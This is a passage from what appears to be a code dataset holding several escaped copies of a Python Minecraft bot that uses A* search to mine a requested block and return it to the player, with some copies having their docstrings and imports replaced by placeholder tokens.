0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block_\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos(\n ) + player_loc) / 2,), 'kwargs': {'block_': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block_ is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n \"\"\"Return whether or not this location holds the target block.\"\"\"\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_ is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\ndef _drops(dist, drop):\n \"\"\"Return the number of times it takes to drop a distance dist. drop is the\n length of one drop. 
Both are assumed positive.\"\"\"\n rtn = dist / drop\n if dist % drop != 0:\n rtn += 1\n return rtn\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot_pos.x, bot_pos.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block_ is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in {_AIR, _LAVA, _WATER}:\n for vert_dir in [_Vec3(0, 1, 0), _Vec3(0, 2, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n rtn.append({'func': '_move', 'args': (base_pos + _Vec3(0, 1,\n 0),)})\n for vert_dir in [_Vec3(), _Vec3(0, 1, 0)]:\n if self._get_block(base_pos + vert_dir) not in empty_blocks:\n break\n else:\n pos = base_pos + _Vec3(0, -1, 0)\n for _ in xrange(_DROP_PLUS_1):\n block_ = self._get_block(pos)\n if block_ != _AIR:\n if block_ != _LAVA:\n rtn.append({'func': '_move', 'args': (pos + _Vec3(0,\n 1, 0),)})\n break\n pos.y -= 1\n return rtn\n\n def 
_surrounded(self):\n \"\"\"Return whether or not the bot is surrounded by water.\"\"\"\n for dir_ in _adj_dirs():\n if self._get_block(self._pos + dir_) != _WATER:\n return False\n return True\n\n def _get_mine_actions(self):\n \"\"\"Return a list of legal mining actions (that only involve mining\n and not moving).\"\"\"\n rtn = []\n dont_mine = {_AIR, _WATER, _LAVA}\n pos_above = self._pos + _Vec3(0, 2, 0)\n if self._get_block(pos_above) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos_above,)})\n for dir_ in _adj_dirs():\n pos = self._pos + dir_\n for _ in xrange(2):\n if self._get_block(pos) not in dont_mine:\n rtn.append({'func': '_mine', 'args': (pos,)})\n pos = pos + _Vec3(0, 1, 0)\n return rtn\n\n def _get_placement_actions(self, exclude=None):\n \"\"\"Return a list of legal actions that only involve placing a block\n from the inventory.\n\n exclude is a block id. It is the block that should not be placed. If None,\n any block can be placed.\"\"\"\n if not self._has_blocks_to_place(exclude=exclude):\n return []\n dirs = [_Vec3(0, 2, 0)]\n for dir_ in _adj_dirs():\n dirs.extend([dir_, dir_ + _Vec3(0, 1, 0)])\n if self._get_block(self._pos + dir_) in [_AIR, _WATER]:\n dirs.append(dir_ + _Vec3(0, -1, 0))\n rtn = []\n for dir_ in dirs:\n pos = self._pos + dir_\n if self._can_place(pos):\n rtn.append({'func': '_place', 'args': (pos,), 'kwargs': {\n 'exclude': exclude}})\n return rtn\n\n def _can_place(self, loc):\n \"\"\"Return whether or not the bot can place a block at that location\n independent of what it has in its inventory.\"\"\"\n non_blocks = [_AIR, _WATER, _LAVA]\n player = [self._pos, self._pos + _Vec3(0, 1, 0)]\n for dir_ in (_adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]):\n new_loc = loc + dir_\n if new_loc not in player and self._get_block(new_loc\n ) not in non_blocks:\n return True\n return False\n\n def _has_blocks_to_place(self, exclude=None):\n \"\"\"Return whether or not the bot can place a block from the\n inventory. If exclude is None, any block can be placed.\"\"\"\n for block_ in self._inventory:\n if block_ != exclude:\n return True\n return False\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. block_ is the block id.\"\"\"\n raise NotImplementedError\n\n def _move(self, pos):\n \"\"\"Move there only.\"\"\"\n self._pos = deepcopy(pos)\n\n\nclass _ImaginaryBot(_GenericBot):\n \"\"\"A bot used for finding paths that doesn't actually change blocks\n in the world.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Create a new bot.\"\"\"\n _GenericBot.__init__(self, pos, inventory)\n self._changes = {}\n\n def _set_block(self, pos, block_):\n \"\"\"Set a block. 
block_ is the block id.\"\"\"\n self._changes[deepcopy(pos)] = block_\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n if pos in self._changes:\n return self._changes[pos]\n else:\n return _get_mc().getBlock(pos)\n\n def get_block(self, pos):\n \"\"\"The public version.\"\"\"\n return self._get_block(pos)\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash(frozenset([self._pos] + _key_vals(self._inventory) +\n _key_vals(self._changes)))\n\n\nclass Bot(_GenericBot):\n \"\"\"The real bot.\n\n All vector arguments are Vec3s.\"\"\"\n _BOT_BLOCK = block.IRON_BLOCK.id\n\n def __init__(self):\n \"\"\"Create a bot next to the player.\"\"\"\n pos = _get_mc().player.getTilePos() + Vec3(2, 0, 0)\n pos = _Vec3(pos.x, pos.y, pos.z)\n _GenericBot.__init__(self, pos)\n self._pos = pos\n self._move(self._pos)\n\n @staticmethod\n def destroy_all():\n \"\"\"Destroy all bots within a small distance (in case I forget to\n destroy one).\"\"\"\n player_loc = _player_loc()\n minec = _get_mc()\n rad = 10\n for x in xrange(player_loc.x - rad, player_loc.x + rad):\n for y in xrange(player_loc.y - rad, player_loc.y + rad):\n for z in xrange(player_loc.z - rad, player_loc.z + rad):\n if minec.getBlock(x, y, z) == Bot._BOT_BLOCK:\n minec.setBlock(x, y, z, _AIR)\n\n def destroy(self):\n \"\"\"Set itself to air.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n\n def fetch(self, block_name):\n \"\"\"Mine and return a block to the player.\"\"\"\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n block_id = getattr(block, block_name).id\n block_loc = self._get_block_loc(block_id)\n mine_prob = _MineProblem(imag_bot, block_loc, block_id)\n mine_actions = astar(mine_prob, _mine_heuristic)\n self.take_actions(mine_actions, _DELAY)\n imag_bot = _ImaginaryBot(self._pos, self._inventory)\n player_loc = _player_loc()\n return_prob = _ReturnProblem(imag_bot, block_id, player_loc)\n return_actions = astar(return_prob, _return_heuristic)\n imag_bot.take_actions(return_actions)\n return_actions.append({'func': '_place', 'args': ((imag_bot.get_pos(\n ) + player_loc) / 2,), 'kwargs': {'block_': block_id}})\n self.take_actions(return_actions, _DELAY)\n\n def _get_block_loc(self, block_id):\n \"\"\"Return the location of the block.\"\"\"\n find_prob = FindProblem(self._pos, block_id)\n dirs = bfs(find_prob)\n return self._pos + sum(dirs)\n\n def _set_block(self, pos, block_):\n \"\"\"Place an actual block in the world.\n\n block_ is a block id.\"\"\"\n _get_mc().setBlock(pos, block_)\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n return _get_mc().getBlock(pos)\n\n def _move(self, pos):\n \"\"\"Move there, and set the appropriate blocks.\"\"\"\n self._set_block(self._pos, _AIR)\n self._set_block(self._pos + _Vec3(0, 1, 0), _AIR)\n self._set_block(pos, self._BOT_BLOCK)\n self._set_block(pos + _Vec3(0, 1, 0), self._BOT_BLOCK)\n self._pos = pos\n\n\nclass FindProblem(SearchProblem):\n \"\"\"Problem for finding the location of a block in the world.\n\n A state in this problem is a location.\n \"\"\"\n\n def __init__(self, start_loc, block_id):\n \"\"\"Initialize.\"\"\"\n self._start_loc = deepcopy(start_loc)\n self._block_id = block_id\n\n def getStartState(self):\n \"\"\"Return the starting location.\"\"\"\n return self._start_loc\n\n def isGoalState(self, state):\n \"\"\"Return whether or not this location holds the target block.\"\"\"\n return _get_mc().getBlock(state) == self._block_id\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for dir_ in 
_all_dirs():\n successor = state + dir_\n if successor.y <= _get_mc().getHeight(successor.x, successor.z\n ) and _get_mc().getBlock(successor) != _BEDROCK:\n rtn.append((successor, dir_, 1))\n return rtn\n\n\nclass _MineProblem(SearchProblem):\n \"\"\"The problem of finding the block and mining it (not returning\n it).\"\"\"\n\n def __init__(self, imag_bot, block_loc, block_id):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_loc is a Vec3.\n \"\"\"\n self._bot = imag_bot\n self._block_loc = deepcopy(block_loc)\n self._block_id = block_id\n\n def get_block_loc(self):\n \"\"\"Return the block location.\"\"\"\n return deepcopy(self._block_loc)\n\n def get_block_id(self):\n \"\"\"Return the block it's trying to mine.\"\"\"\n return self._block_id\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot has the block.\"\"\"\n return state.contains(self._block_id)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions():\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\nclass _ReturnProblem(SearchProblem):\n \"\"\"The problem of returning to the player. This does not place the block\n next to the player.\"\"\"\n\n def __init__(self, imag_bot, block_, player_loc):\n \"\"\"Initialize the problem with an _ImaginaryBot.\n\n block_ is a block id.\"\"\"\n self._bot = imag_bot\n self._block = block_\n self._player_loc = player_loc\n\n def get_player_loc(self):\n \"\"\"Return the player location.\"\"\"\n return deepcopy(self._player_loc)\n\n def getStartState(self):\n \"\"\"Return the bot passed in.\"\"\"\n return self._bot\n\n def isGoalState(self, state):\n \"\"\"Return whether or not the bot is next to the player.\"\"\"\n diff = state.get_pos() - self._player_loc\n return diff.y == 0 and (diff.x == 0 or diff.z == 0) and abs(diff.x\n ) + abs(diff.z) == 2 and state.get_block(self._player_loc + \n diff / 2 + _Vec3(0, -1, 0)) not in (_AIR, _LAVA, _WATER)\n\n def getSuccessors(self, state):\n \"\"\"Return the successors.\"\"\"\n rtn = []\n for action in state.get_legal_actions(self._block):\n successor = deepcopy(state)\n successor.take_action(action)\n rtn.append((successor, action, 1))\n return rtn\n\n\ndef _mine_heuristic(bot, problem):\n \"\"\"Return the mining heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n if bot.contains(problem.get_block_id()):\n return 0\n bot_pos = bot.get_pos()\n dest_pos = problem.get_block_loc()\n man_dist = _manhattan((bot_pos.x, bot_pos.z), (dest_pos.x, dest_pos.z))\n y_diff = bot_pos.y - dest_pos.y\n if y_diff < 0:\n y_diff += 1\n if y_diff == 0:\n return man_dist\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n if man_dist > drops:\n return man_dist\n if man_dist == drops:\n return man_dist + 1\n if drop == 1:\n return drops\n if y_diff % drop == 1:\n return drops\n return drops + 1\n\n\ndef _drops(dist, drop):\n \"\"\"Return the number of times it takes to drop a distance dist. drop is the\n length of one drop. 
Both are assumed positive.\"\"\"\n rtn = dist / drop\n if dist % drop != 0:\n rtn += 1\n return rtn\n\n\ndef _return_heuristic(bot, problem):\n \"\"\"Return the return heuristic.\n\n bot is an _ImaginaryBot.\n \"\"\"\n bot_pos = bot.get_pos()\n player_pos = problem.get_player_loc()\n bot_plane_pos = bot_pos.x, bot_pos.z\n y_diff = bot_pos.y - player_pos.y\n drop = _DROP if y_diff > 0 else 1\n y_diff = abs(y_diff)\n drops = _drops(y_diff, drop)\n min_man = float('inf')\n for dir_ in _adj_dirs():\n loc = player_pos + 2 * dir_\n man_dist = _manhattan(bot_plane_pos, (loc.x, loc.z))\n if man_dist < min_man:\n min_man = man_dist\n if man_dist < drops:\n return drops\n return min_man\n\n\ndef _to_my_vec3(vec):\n \"\"\"Return the _Vec3 alternative of the Vec3.\"\"\"\n return _Vec3(vec.x, vec.y, vec.z)\n\n\ndef _player_loc():\n \"\"\"Return the player's location.\"\"\"\n return _to_my_vec3(_get_mc().player.getTilePos())\n\n\ndef _adj_dirs():\n \"\"\"Return the adjacent directions.\"\"\"\n return [_Vec3(1, 0, 0), _Vec3(-1, 0, 0), _Vec3(0, 0, 1), _Vec3(0, 0, -1)]\n\n\ndef _all_dirs():\n \"\"\"Return all adjacent directions.\"\"\"\n return _adj_dirs() + [_Vec3(0, 1, 0), _Vec3(0, -1, 0)]\n\n\ndef _manhattan(pos1, pos2):\n \"\"\"Return the manhattan distance. pos1 and pos2 should be iterable.\"\"\"\n return sum(abs(val1 - val2) for val1, val2 in zip(pos1, pos2))\n\n\n@singleton\ndef _get_mc():\n \"\"\"Return the Minecraft instance.\"\"\"\n return minecraft.Minecraft.create()\n\n\ndef _key_vals(dict_):\n \"\"\"Return a list of key-val tuples.\"\"\"\n return [(key, val) for key, val in dict_.iteritems()]\n", "<docstring token>\n<import token>\n<assignment token>\n\n\nclass _Vec3(Vec3):\n \"\"\"A Vec3 that is hashable. Everything in this program should use this\n class.\"\"\"\n\n def __hash__(self):\n \"\"\"Return the hash.\"\"\"\n return hash((self.x, self.y, self.z))\n\n def clone(self):\n \"\"\"Return a clone.\"\"\"\n return _Vec3(self.x, self.y, self.z)\n\n\nclass _GenericBot:\n \"\"\"A generic bot.\"\"\"\n\n def __init__(self, pos, inventory=None):\n \"\"\"Initialize with an empty inventory.\n\n inventory is a dictionary. If None, an empty one will be used.\"\"\"\n if inventory is None:\n self._inventory = {}\n else:\n self._inventory = deepcopy(inventory)\n self._pos = deepcopy(pos)\n\n def take_action(self, action):\n \"\"\"Take the action (acquired from _get_legal_actions).\"\"\"\n getattr(self, action['func'])(*action.get('args', ()), **action.get\n ('kwargs', {}))\n\n def take_actions(self, actions, seconds=None):\n \"\"\"Take these actions. If seconds is not None, sleep 'seconds' \n seconds.\n \"\"\"\n if not actions:\n return\n self.take_action(actions[0])\n for action in actions[1:]:\n if seconds is not None:\n sleep(seconds)\n self.take_action(action)\n\n def get_pos(self):\n \"\"\"Return the position.\"\"\"\n return deepcopy(self._pos)\n\n def get_legal_actions(self, block_=None):\n \"\"\"Return a list of legal actions.\n\n If block_ is None, return all legal actions. 
Otherwise, return all\n legal actions that don't involve placing the block.\"\"\"\n return self._get_move_actions(block_) + self._get_mine_actions(\n ) + self._get_placement_actions(block_)\n\n def contains(self, block_):\n \"\"\"Return whether or not the bot contains the block id.\"\"\"\n return block_ in self._inventory\n\n def _get_block(self, pos):\n \"\"\"Get the block at the position.\"\"\"\n raise NotImplementedError\n\n def _place(self, loc, exclude=None, block_=None):\n \"\"\"Place a block from the inventory only.\n\n If exclude is not None, place a block that is not 'exclude'.\n If block_ is not None, place that block only.\n \"\"\"\n if not self._inventory:\n raise Exception('Inventory empty')\n if block_ is None:\n for key in self._inventory:\n if key != exclude:\n block_ = key\n break\n else:\n raise Exception(\n 'You requested not to place %s, but it is the only block in the inventory.'\n % exclude)\n if block_ not in self._inventory:\n raise Exception('Block %s is not in the inventory' % block_)\n if self._inventory[block_] == 1:\n del self._inventory[block_]\n else:\n self._inventory[block_] -= 1\n self._set_block(loc, block_)\n\n def _move_down(self):\n \"\"\"Move and mine the block below.\"\"\"\n new_pos = self._pos + _Vec3(0, -1, 0)\n block_ = self._get_block(new_pos)\n if block_ != _WATER:\n self._add_to_inv(block_)\n self._move(new_pos)\n\n def _add_to_inv(self, block_):\n \"\"\"Add the block to the inventory.\"\"\"\n if block_ in self._inventory:\n self._inventory[block_] += 1\n else:\n self._inventory[block_] = 1\n\n def _move_up(self, exclude=None):\n \"\"\"Move and place a block below.\n\n If exclude is not None, place a block that is not 'exclude'.\n \"\"\"\n self._move(self._pos + _Vec3(0, 1, 0))\n self._place(self._pos + _Vec3(0, -1, 0), exclude)\n\n def _mine(self, loc):\n \"\"\"Mine the block.\"\"\"\n block_ = self._get_block(loc)\n self._add_to_inv(block_)\n self._set_block(loc, _AIR)\n\n def _get_move_actions(self, exclude=None):\n \"\"\"Return a list of legal movement actions.\n\n exclude is the block to exclude.\n \"\"\"\n rtn = []\n can_move_up = self._get_block(self._pos + _Vec3(0, 2, 0)) in {_AIR,\n _WATER}\n if can_move_up:\n if self._surrounded():\n rtn.append({'func': '_move', 'args': (self._pos + _Vec3(0, \n 1, 0),)})\n else:\n rtn.append({'func': '_move_up', 'args': (exclude,)})\n hidden_block = self._get_block(self._pos + _Vec3(0, -2, 0))\n if hidden_block == _WATER or hidden_block not in {_AIR, _LAVA}:\n rtn.append({'func': '_move_down'})\n for dir_ in _adj_dirs():\n rtn.extend(self._side_moves(dir_, can_move_up))\n return rtn\n\n def _side_moves(self, dir_, can_move_up):\n \"\"\"Return the list of side moves.\n\n dir_ is an adjacent direction.\n can_move_up is a boolean for whether or not the bot can move up.\n \"\"\"\n rtn = []\n base_pos = self._pos + dir_\n base_block = self._get_block(base_pos)\n empty_blocks = {_AIR, _WATER}\n if can_move_up and base_block not in 